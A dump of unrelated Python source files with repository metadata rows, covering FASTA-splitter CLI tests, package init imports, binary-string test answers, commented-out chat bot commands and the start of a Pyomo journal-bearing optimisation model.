sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group,
["split", str(temporary_multiple_sequences_file)])
assert result.return_value is None
assert result.exit_code == 0
assert result.exc_info[0] == SystemExit
assert result.exception is None
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_execute_split_command_with_sequences_file_and_generate_list_paths_then_return_successful_exit_code_zero():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
individual_sequences_files_path_list_file_expected = Path("Sequences_Path_List.txt")
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group,
["split", str(temporary_multiple_sequences_file), "--generate-path-list"])
assert result.return_value is None
assert result.exit_code == 0
assert result.exc_info[0] == SystemExit
assert result.exception is None
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
individual_sequences_files_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_execute_split_command_with_sequences_file_path_and_verbose_then_return_successful_exit_code_zero():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
temporary_multiple_sequences_file = Path("sequences.fasta")
split_details_message_expected = "Multiple sequences file (source): {0}\n" \
"Number of individual sequences read from source: {1}\n" \
"Number of individual sequences files written to disk: {2}\n" \
"Location of individual sequences files: {3}\n" \
"Individual sequences files path list file: {4}" \
.format(str(Path.cwd().joinpath(temporary_multiple_sequences_file)), "3", "3", str(Path.cwd()), "None\n")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group,
["split", str(temporary_multiple_sequences_file), "--verbose"])
assert result.return_value is None
assert result.exit_code == 0
assert result.exc_info[0] == SystemExit
assert result.exception is None
assert result.output == split_details_message_expected
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_execute_main_function_without_sequences_file_path_argument_then_throws_file_not_found_exception():
sys.argv = ["", ""]
with pytest.raises(FileNotFoundError) as pytest_wrapped_e:
runpy.run_path("fastasplitter_splitter/splitter.py", run_name="__main__")
assert pytest_wrapped_e.type == FileNotFoundError
assert str(pytest_wrapped_e.value) == "FASTA multiple sequences file not found!"
| 65.012007 | 120 | 0.796053 | 4,395 | 37,902 | 6.283732 | 0.043914 | 0.12992 | 0.201506 | 0.115146 | 0.926603 | 0.90122 | 0.870515 | 0.842488 | 0.800992 | 0.78133 | 0 | 0.005797 | 0.139782 | 37,902 | 582 | 121 | 65.123711 | 0.841246 | 0 | 0 | 0.671815 | 0 | 0 | 0.078492 | 0.016094 | 0 | 0 | 0 | 0 | 0.133205 | 1 | 0.061776 | false | 0.009653 | 0.013514 | 0 | 0.07529 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e7d3897d433a06d6a32f433b125bb462700d4766 | 124 | py | Python | dirscan/dirsearch/lib/connection/__init__.py | imfiver/Sec-Tools | a828e31c2e371c37f1256f0a574707a24776530d | [
"Apache-2.0"
] | 144 | 2021-11-05T10:45:05.000Z | 2022-03-31T03:17:19.000Z | dirscan/dirsearch/lib/connection/__init__.py | imfiver/Sec-Tools | a828e31c2e371c37f1256f0a574707a24776530d | [
"Apache-2.0"
] | 6 | 2021-11-07T02:47:41.000Z | 2022-03-06T05:50:15.000Z | dirscan/dirsearch/lib/connection/__init__.py | imfiver/Sec-Tools | a828e31c2e371c37f1256f0a574707a24776530d | [
"Apache-2.0"
] | 41 | 2021-11-07T13:35:02.000Z | 2022-03-29T00:09:36.000Z | from .request_exception import * # noqa: F401
from .requester import * # noqa: F401
from .response import * # noqa: F401
| 31 | 46 | 0.709677 | 16 | 124 | 5.4375 | 0.5 | 0.344828 | 0.482759 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09 | 0.193548 | 124 | 3 | 47 | 41.333333 | 0.78 | 0.258065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
99c9289492faff2d355a862d73e62b667bf06c4c | 150 | py | Python | contact_form/models/__init__.py | joebos/django-cbv-contact-form | a4905de7081906af7bb1ceac24a9c3243e07e536 | [
"BSD-3-Clause"
] | 1 | 2015-10-05T01:25:36.000Z | 2015-10-05T01:25:36.000Z | contact_form/models/__init__.py | joebos/django-cbv-contact-form | a4905de7081906af7bb1ceac24a9c3243e07e536 | [
"BSD-3-Clause"
] | null | null | null | contact_form/models/__init__.py | joebos/django-cbv-contact-form | a4905de7081906af7bb1ceac24a9c3243e07e536 | [
"BSD-3-Clause"
] | null | null | null | from contact_form.models.subject import Subject
from contact_form.models.department import Department
from contact_form.models.message import Message
| 37.5 | 53 | 0.88 | 21 | 150 | 6.142857 | 0.380952 | 0.255814 | 0.348837 | 0.488372 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 150 | 3 | 54 | 50 | 0.934783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
99e1d6a6e3e8c8c4fbf252fb99799024f2e1e828 | 10,341 | py | Python | src/tests/fixtures/answers/bitSwapAnswer.py | lalyon/python_testbed | be3545de15e7b244ad2c060f11d84ee317532dc7 | [
"MIT"
] | null | null | null | src/tests/fixtures/answers/bitSwapAnswer.py | lalyon/python_testbed | be3545de15e7b244ad2c060f11d84ee317532dc7 | [
"MIT"
] | null | null | null | src/tests/fixtures/answers/bitSwapAnswer.py | lalyon/python_testbed | be3545de15e7b244ad2c060f11d84ee317532dc7 | [
"MIT"
] | null | null | null | testBinSwapAns0 = ('0b10101000', '0b10100', '0b10100', '0b10001', '0b10000', '0b10100', '0b10001', '0b10000', '0b10000', '0b10000', '0b10000', '0b10000', '0b10001', '0b10000', '0b10000', '0b10001', '0b10100', '0b10100', '0b10000', '0b10000', '0b10000', '0b10101', '0b10000', '0b10001', '0b10000', '0b10000', '0b10001', '0b10000', '0b10000', '0b10000', '0b10000', '0b10100', '0b10101', '0b10000', '0b10000', '0b10101', '0b10000', '0b10000', '0b10101', '0b10000', '0b10000', '0b10001', '0b10000', '0b10000', '0b10000', '0b10000', '0b10000', '0b10101', '0b10101', '0b10101', '0b101')
testBinSwapAns1 = ('0b1010101', '0b1000100', '0b1010101', '0b1010000', '0b0', '0b100000', '0b101', '0b1', '0b100', '0b1', '0b0', '0b10', '0b10', '0b0', '0b0', '0b0', '0b10', '0b0', '0b10', '0b0', '0b0', '0b0', '0b1010101', '0b1000101', '0b0', '0b1', '0b0', '0b100', '0b1', '0b1', '0b1', '0b1', '0b1010', '0b100', '0b1', '0b1', '0b1', '0b100', '0b100', '0b100', '0b101', '0b100', '0b101000', '0b100', '0b100', '0b101', '0b101', '0b100', '0b100', '0b1', '0b1', '0b101', '0b101000', '0b100', '0b101', '0b101', '0b101', '0b100', '0b101', '0b100', '0b100', '0b10000', '0b10000', '0b10101', '0b10001', '0b10000', '0b10001', '0b10100', '0b10001', '0b100', '0b100', '0b10100', '0b10001', '0b10100', '0b10100', '0b10000', '0b10000', '0b10000', '0b10000', '0b10000', '0b101', '0b10001', '0b10100', '0b10100', '0b10100', '0b10001', '0b10100', '0b10101', '0b10001', '0b10000', '0b10001', '0b1010101', '0b1000101', '0b0', '0b1', '0b10', '0b100', '0b100', '0b100', '0b100', '0b101', '0b100', '0b100', '0b100', '0b100', '0b100', '0b10001', '0b10000', '0b100', '0b10000', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b10001', '0b1010101', '0b1000000', '0b0', '0b100010', '0b100', '0b0', '0b1000000', '0b0', '0b1000000', '0b1', '0b10', '0b10001', '0b0', '0b1', '0b100010', '0b10', '0b1', '0b100010', '0b10', '0b1010101', '0b1000000', '0b0', '0b101', '0b0', '0b0', '0b0', '0b10', '0b1010', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b10', '0b1', '0b1', '0b1000', '0b1010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b101', '0b1010101', '0b1000000', '0b0', '0b1010000', '0b100000', '0b0', '0b1', '0b10', '0b1', '0b1', '0b1', '0b1000', '0b1', '0b1010', '0b1010', '0b1000', '0b1000', '0b0', '0b0', '0b0', '0b10', '0b10100', '0b10', '0b1', '0b1', '0b0', '0b1000', '0b100010', '0b1010', '0b1', '0b10000', '0b10000', '0b10000010', '0b1', '0b1', '0b10100010', '0b10000', '0b1', '0b10001', '0b10000', '0b101000', '0b10001', '0b1000000', '0b1000000', '0b1010000', '0b100', '0b10001', '0b1', '0b1010000', '0b1000000', '0b101010', '0b1', '0b1000000', '0b1010000', '0b10000', '0b10001', '0b10001', '0b10001', '0b1000001', '0b100', '0b101', '0b1', '0b1', '0b100', '0b100', '0b101', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1', '0b10001000', '0b10001010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b1', '0b10101000', '0b10101010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010000', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010000', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010101', '0b1000000', '0b0', '0b101', '0b10', '0b0', '0b1', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b10', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b0', '0b10', '0b1', '0b1', '0b1000', '0b1010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b101', '0b1010101', '0b1000000', '0b0', '0b1010000', '0b100010', '0b0', '0b1', '0b10', '0b1', '0b1000', '0b1000', '0b1', '0b1000', '0b1', '0b1010', '0b1000', '0b1000', '0b0', '0b10', '0b1', '0b10001', '0b0', '0b10', '0b1', '0b1', '0b100010', '0b1000', '0b1010', '0b10000', '0b10000', '0b1', '0b1', '0b10000010', '0b10100010', '0b1', '0b10000', '0b10000', '0b1', '0b10001', '0b10001', '0b1000000', '0b100', '0b101000', '0b1', '0b1000000', '0b1010000', '0b1010000', '0b1000000', '0b100', '0b10001', '0b10001', '0b1', '0b1010000', '0b101010', '0b10001', '0b10001', '0b1000000', '0b101', '0b1', '0b10000', '0b10000', '0b1010000', '0b10000', '0b1010000', '0b1', '0b100', '0b100', '0b101', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1', '0b10001000', '0b10001010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b1', '0b10101000', '0b10101010', '0b1', '0b1', '0b100', '0b100', '0b101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b10001', '0b10000', '0b10000', '0b10001', '0b10001', '0b10100', '0b10100', '0b10101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1000001', '0b1000001', '0b1000000', '0b1000000', '0b1000001', '0b1000001', '0b1000100', '0b1000100', '0b1000101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010001', '0b1010001', '0b1010000', '0b1010000', '0b1010001', '0b1010001', '0b1010100', '0b1010100', '0b1010101', '0b1010101', '0b1000101', '0b0', '0b100', '0b1', '0b10', '0b0', '0b1', '0b100010', '0b1', '0b100010', '0b0', '0b10101', '0b0', '0b1010100', '0b1010101', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b1', '0b1000101', '0b10100', '0b1010000', '0b101', '0b1010101', '0b1000100')
| 3,447 | 9,759 | 0.619766 | 983 | 10,341 | 6.519837 | 0.031536 | 0.119831 | 0.249649 | 0.275238 | 0.75706 | 0.732876 | 0.692464 | 0.676081 | 0.674208 | 0.674208 | 0 | 0.57717 | 0.095252 | 10,341 | 2 | 9,760 | 5,170.5 | 0.107845 | 0 | 0 | 0 | 0 | 0 | 0.616865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
821e28e3a641f613c665719271db84274eb79520 | 1,609 | py | Python | athus/terminar.py | londarks/Athus_V3 | fc9498c8eedd8c37302c68149f1010e16c3c0244 | [
"MIT"
] | null | null | null | athus/terminar.py | londarks/Athus_V3 | fc9498c8eedd8c37302c68149f1010e16c3c0244 | [
"MIT"
] | null | null | null | athus/terminar.py | londarks/Athus_V3 | fc9498c8eedd8c37302c68149f1010e16c3c0244 | [
"MIT"
] | null | null | null | # def block (self, message, name_sender, tripcode, id_sender):
# message = message[7:]
# for i in range(len(self.admin_list)):
# if tripcode == self.admin_list[i]:
# if 'gif' in message:
# t_gif = threading.Thread(
# target=self.social.blockGifCommand)
# t_gif.start()
# elif 'music' in message:
# t_music = threading.Thread(
# target=self.music.blockMusicCommand)
# t_music.start()
# elif 'ship' in message:
# t_ship = threading.Thread(
# target=self.social.blockShipCommand)
# t_ship.start()
# def anable (self, message, name_sender, tripcode, id_sender):
# message = message[8:]
# for i in range(len(self.admin_list)):
# if tripcode == self.admin_list[i]:
# if 'gif' in message:
# t_gif = threading.Thread(
# target=self.social.AnableGifCommand)
# t_gif.start()
# elif 'music' in message:
# t_music = threading.Thread(
# target=self.music.AnableMusicCommand)
# t_music.start()
# elif 'ship' in message:
# t_ship = threading.Thread(
# target=self.social.AnableShipCommand)
# t_ship.start()
#https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git | 44.694444 | 70 | 0.477937 | 151 | 1,609 | 4.960265 | 0.291391 | 0.072096 | 0.080107 | 0.200267 | 0.742323 | 0.742323 | 0.742323 | 0.742323 | 0.742323 | 0.606142 | 0 | 0.002137 | 0.418272 | 1,609 | 36 | 70 | 44.694444 | 0.798077 | 0.875078 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8226a0467ffd4c41d9e6a60521de064ba5e1981e | 501,041 | py | Python | tests/examples/minlplib/jbearing25.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 2 | 2021-07-03T13:19:10.000Z | 2022-02-06T10:48:13.000Z | tests/examples/minlplib/jbearing25.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 1 | 2021-07-04T14:52:14.000Z | 2021-07-15T10:17:11.000Z | tests/examples/minlplib/jbearing25.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | null | null | null | # NLP written by GAMS Convert at 04/21/18 13:52:25
#
# Equation counts
# Total E G L N X C B
# 1 1 0 0 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 1405 1405 0 0 0 0 0 0
# FX 154 154 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 1405 1 1404 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x2 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x3 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x4 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x5 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x6 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x7 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x8 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x9 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x10 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x11 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x12 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x13 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x14 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x15 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x16 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x17 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x18 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x19 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x20 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x21 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x22 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x23 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x24 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x25 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x26 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x27 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x28 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x29 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x30 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x31 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x32 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x33 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x34 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x35 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x36 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x37 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x38 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x39 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x40 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x41 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x42 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x43 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x44 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x45 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x46 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x47 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x48 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x49 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x50 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x51 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x52 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x53 = Var(within=Reals,bounds=(0,None),initialize=0.122888290664714)
m.x54 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x57 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x58 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x59 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x60 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x61 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x62 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x63 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x64 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x65 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x66 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x67 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x68 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x69 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x70 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x71 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x72 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x73 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x74 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x75 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x76 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x77 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x78 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x79 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x80 = Var(within=Reals,bounds=(0,None),initialize=0.243913720108378)
m.x81 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
m.x84 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
m.x87 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
m.x88 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
m.x89 = Var(within=Reals,bounds=(0,None),initialize=0.361241666187154)
